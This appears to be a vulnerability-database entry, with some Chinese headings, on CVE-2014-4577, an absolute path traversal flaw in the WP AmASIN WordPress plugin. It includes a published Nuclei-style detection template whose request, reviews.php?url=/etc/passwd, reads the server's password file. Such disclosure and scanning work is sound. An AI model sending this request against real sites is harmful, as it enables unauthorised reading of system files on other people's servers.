CVE-2014-4577: WP AmASIN – The Amazon Affiliate Shop - Local File Inclusion

日期: 2025-08-01 | 影响软件: WP AmASIN – The Amazon Affiliate Shop | POC: 已公开

漏洞描述

Absolute path traversal vulnerability in reviews.php in the WP AmASIN - The Amazon Affiliate Shop plugin 0.9.6 and earlier for WordPress allows remote attackers to read arbitrary files via a full pathname in the url parameter.

PoC代码[已公开]

id: CVE-2014-4577

info:
  name: WP AmASIN – The Amazon Affiliate Shop - Local File Inclusion
  author: DhiyaneshDK
  severity: medium
  description: |
    Absolute path traversal vulnerability in reviews.php in the WP AmASIN - The Amazon Affiliate Shop plugin 0.9.6 and earlier for WordPress allows remote attackers to read arbitrary files via a full pathname in the url parameter.
  reference:
    - https://codevigilant.com/disclosure/wp-plugin-wp-amasin-the-amazon-affiliate-shop-local-file-inclusion/
    - https://wpscan.com/plugin/wp-amasin-the-amazon-affiliate-shop/
    - https://github.com/superlink996/chunqiuyunjingbachang
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
    cvss-score: 5
    cve-id: CVE-2014-4577
    cwe-id: CWE-22
    epss-score: 0.03228
    epss-percentile: 0.86596
    cpe: cpe:2.3:a:websupporter:wp_amasin_-_the_amazon_affiliate_shop:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: websupporter
    product: wp_amasin_-_the_amazon_affiliate_shop
    framework: wordpress
    publicwww-query: "/wp-content/plugins/wp-amasin-the-amazon-affiliate-shop/"
  tags: cve,cve2014,wordpress,wpscan,wp-plugin,lfi,wp,wp-amasin-the-amazon-affiliate-shop

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body,"/wp-content/plugins/wp-amasin-the-amazon-affiliate-shop/")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        GET /wp-content/plugins/wp-amasin-the-amazon-affiliate-shop/reviews.php?url=/etc/passwd HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 490a0046304402204fbadc163b4d0b4d0dd55182b648b80b3676cee66887ca56d3f0798240b0504302203a6ee83ebd86bb46b2b5dfa4c8b58f2e0b8f32ef770ec43c60ecc3207b63204e:922c64590222798bb761d5b6d8e72950

相关漏洞推荐